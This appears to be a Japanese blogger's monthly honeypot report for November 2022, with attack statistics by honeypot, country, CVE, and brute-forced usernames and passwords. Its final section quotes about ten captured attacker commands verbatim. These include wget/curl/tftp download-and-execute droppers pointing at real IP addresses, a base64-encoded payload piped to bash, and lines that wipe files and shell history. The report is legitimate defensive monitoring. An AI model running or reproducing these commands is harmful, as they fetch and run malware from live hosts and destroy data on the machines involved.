Midnight Monologues

日々勉強したことを書いてきます

ハニーポット運用(月次報告:2022年11月)

Honeypot セキュリティ

今月のTopics

1.SECCON CTF 2022 予選 の開催

2022年11月12日(土) 14:00 (JST) ~ 2022年11月13日(日) 14:00 (JST) で開催された SECCON CTF 2022 予選 に参加した。例年通り全く解けず、潔く撃沈。
・所属先のチームとしては精鋭の方々が問題をたくさん解かれて決勝にも行く模様だ...
・所属先の会社がいつの間にかスポンサーになっており、驚きを隠せない。

2.「Citrix ADC」「Citrix Gateway」の脆弱性報告

Citrix Systems社の「Citrix ADC」「Citrix Gateway」にて深刻な脆弱性が報告された。
脆弱性は3件(CVE-2022-27510、CVE-2022-27513、CVE-2022-27516)あるとのこと。

CVE番号 概要
CVE-2022-27510 ゲートウェイにおいて認証のバイパスが可能となり、不正アクセスが可能となる脆弱性
CVE-2022-27513 RDPプロキシ機能を設定した際に、フィッシング攻撃によってリモートデスクトップを乗っ取られるおそれがある脆弱性
CVE-2022-27516 ブルートフォース攻撃の保護機能を回避できる脆弱性


早急な更新バージョンへのアップデートがメーカーより呼びかけられている。
support.citrix.com

T-Potにて1か月運用した結果を記載する。

今月のChangelog

 更新無し。

前提条件

運用日時:2022年10月1日-2022年10月31日
運用期間:31日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先月比
1 Cowrie 1,238,772 191,033
2 Ddospot 864,855 ▲417,561
3 Heralding 726,075 ▲60,013
4 Honeytrap 436,268 ▲131,155
5 Dionaea 262,128 ▲10,406
6 Mailoney 39,705 20,465
7 Adbhoney 20,693 2,678
8 CitrixHoneypot 5,605 3,839
9 Ciscoasa 5,588 3,448
10 Tanner 4,115 ▲1,471
11 ConPot 2,801 40
12 Redishoneypot 2,366 ▲295
13 ElasticPot 865 ▲1,107
14 Ipphoney 184 ▲31
15 Dicompot 76 ▲24
  • Result
    • DDos関連のアクセスが減少し、ssh関連のアクセスが多い傾向があった。
②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 Russia 622,598 2(↑)
2 Brazil 509,899 1(↓)
3 United States 405,576 3(→)
4 Netherlands 250,453 5(↑)
5 China 230,897 4(↓)
6 France 105,541 6(→)
7 Turkey 92,642 圏外(↑)
8 Japan 88,621 9(↑)
9 Germany 80,874 13(↑)
10 Vietnam 77,841 11(↑)
11 United Kingdom 76,021 7(↓)
12 India 73,370 8(↓)
13 Paraguay 69,753 圏外(↑)
14 Singapore 60,598 10(↓)
15 Egypt 52,966 圏外(↑)
16 South Korea 45,498 14(↓)
17 Panama 39,963 16(↓)
18 Indonesia 38,750 15(↓)
19 Bangladesh 36,491 圏外(↑)
20 Sweden 31,260 12(↓)
  • Result
    • ブラジルからのアクセスが減少し、ロシアのアクセス数が1番多い状況になった。
    • トルコ(7位)、パラグアイ(13位)、エジプト(15位)、バングラデシュ(19位)からのアクセスが増加傾向にあった。
③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID Count
1 CVE-2020-11899 494,684
2 CVE-2020-11910 22
3 CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 4
  • Result
    • 先月から変更なし
④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No ユーザ名 件数
1 root 90,663
2 admin 6,416
3 user 5,131
4 test 4,419
5 postgres 4,273
6 nproc 3,200
7 hadoop 2,314
8 mysql 2,279
9 (empty) 2,128
10 ubuntu 1,944
11 git 1,497
12 oracle 1,459
13 sa 1,448
14 22 1,236
15 ftpuser 1,213
16 guest 1,162
17 steam 1,087
18 centos 782
19 support 699
20 2Wire 619
21 !root 606
22 testuser 581
23 www 489
24 es 463
25 jenkins 441
26 ftp 440
27 devops 436
28 ansible 429
29 tester 417
30 vagrant 416
31 esuser 386
32 zjw 382
33 pi 377
34 666666 359
35 ansadmin 357
36 ec2-user 343
37 adm 322
38 0 319
39 cameras 319
40 debug 319
41 unknown 319
42 blank 313
43 $ALOC$ 304
44 dmdba 303
45 elastic 299
46 student 264
47 dev 261
48 emqx 250
49 minecraft 236
50 Admin 233
  • Result
    • 先月から変更なし
⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No パスワード 件数
1 123456 7,409
2 (empty) 3,324
3 nproc 3,200
4 admin 2,392
5 1234 1,629
6 password 1,608
7 123 1,219
8 12345678 1,093
9 12345 1,077
10 root 987
11 blank 926
12 test 698
13 0 665
14 1 664
15 user 640
16 test123 584
17 1qaz@WSX 547
18 ubnt 534
19 00000000 468
20 Test1234 468
21 P@ssw0rd 456
22 1qaz2wsx 451
23 support 450
24 666666 449
25 test1234 439
26 password123 437
27 Test123 428
28 alpine 375
29 passw0rd 370
30 hi3518 363
31 Password123 336
32 Passw0rd 332
33 master 321
34 Test1 320
35 10023 316
36 backup 314
37 cameras 314
38 synnet 310
39 unknown 310
40 _Cisco 306
41 !ishtar 296
42 admin123 294
43 test1 281
44 Aa123456 277
45 1234567890 263
46 abc123 254
47 123123 242
48 !qazzaq! 231
49 123456789 222
50 111111 176
  • Result
    • 今月は数字の羅列のパスワードが全体的に多い傾向にあった。
⑥今月のmasscanとZmap

  • masscanの観測結果は以下の通り。

  • Zmapの観測結果は以下の通り。

  • Result

    • 特記事項は無し。

最後に

  • shファイルとexeファイル関連の問い合わせは以下の通り。

◆shファイルに関するアクセス

No ファイル名 hash値(md5) アクセス
1 - - uname -a;wget -q -O- http://185.161.208.234/test.jpg|perl;wget -q http://185.161.208.234/xxqrzmr.tgz;tar zvxf xxqrzmr.tgz;rm -rf xx;cd .yum-track-qrcommon;chmod +x ;sh sh;nproc;history -c
2 774.sh - cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh
3 774.sh - rm -rf sh; wget http://194.180.48.55/sh || curl -O http://194.180.48.55/sh || tftp 194.180.48.55 -c get sh || tftp -g -r sh 194.180.48.55; chmod 777 sh;./sh ssh; rm -rf sh
4 ohshit.sh 180be9d2fbb747c591d2924ac0b98f62 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://92.87.6.205/ohshit.sh; curl -O http://92.87.6.205/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 92.87.6.205 -c get ohshit1.sh; chmod 777 ohshit1.sh; sh ohshit1.sh; tftp -r ohshit2.sh -g 92.87.6.205; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 92.87.6.205 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *
5 - - sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApybSAtcmYgLlgxOS11bml4Cm1rZGlyIC5YMTktdW5peApjZCAuWDE5LXVuaXgKbXYgL3Zhci90bXAvZG90YTMudGFyLmd6IGRvdGEzLnRhci5negp0YXIgeGYgZG90YTMudGFyLmd6CnNsZWVwIDNzICYmIGNkIC90bXAvLlgxOS11bml4Ly5yc3luYy9jCm5vaHVwIC90bXAvLlgxOS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxOTIuMTY4ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDhtICYmIG5vaHVwIC90bXAvLlgxOS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxNzIuMTYgPj4gL2Rldi9udWxsIDI+MSYKc2xlZXAgMjBtICYmIGNkIC4uOyAvdG1wLy5YMTktdW5peC8ucnN5bmMvaW5pdGFsbCAyPjEmCmV4aXQgMA==" | base64 --decode | bash
6 gay - chmod 777 gay;./gay ;chmod 777 sshddnig; ./sshddnig ssh.mips.echo; rm -rf gay; rm -rf sshddnig
7 - - >/data/local/tmp/.x && cd /data/local/tmp; >/sdcard/0/Downloads/.x && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wget bwget bcurl curl; wget http://45.61.188.83/wget; sh wget; busybox wget http://45.61.188.83/bwget; sh bwget; busybox curl http://45.61.188.83/bcurl > bcurl; sh bcurl; curl http://45.61.188.83/curl > curl; sh curl
8 c.sh - cd /data/local/tmp/; busybox wget http://host.chxv8ybuh2ytmfvfwrulcdqtywlooiybaevwsa2b.org/w.sh; sh w.sh; curl http://host.chxv8ybuh2ytmfvfwrulcdqtywlooiybaevwsa2b.org/c.sh; sh c.sh
9 34750f03237595d58567332a2346a23c 34750f03237595d58567332a2346a23c cd /tmp ; wget 109.239.57.240/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 109.239.57.240/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c
10 Dynabins.sh - cd /tmp || cd /run || cd /; wget http://3.90.219.71/Dynabins.sh; chmod 777 Dynabins.sh; sh Dynabins.sh; tftp 3.90.219.71 -c get Dynatftp1.sh; chmod 777 Dynatftp1.sh; sh Dynatftp1.sh; tftp -r Dynatftp2.sh -g 3.90.219.71; chmod 777 Dynatftp2.sh; sh Dynatftp2.sh; rm -rf Dynabins.sh Dynatftp1.sh Dynatftp2.sh; rm -fr *



◆exeファイルに関するアクセス

  • 無し
今月の作業BGM
曲名 アーティスト 備考
Never Enough Loren Allred ---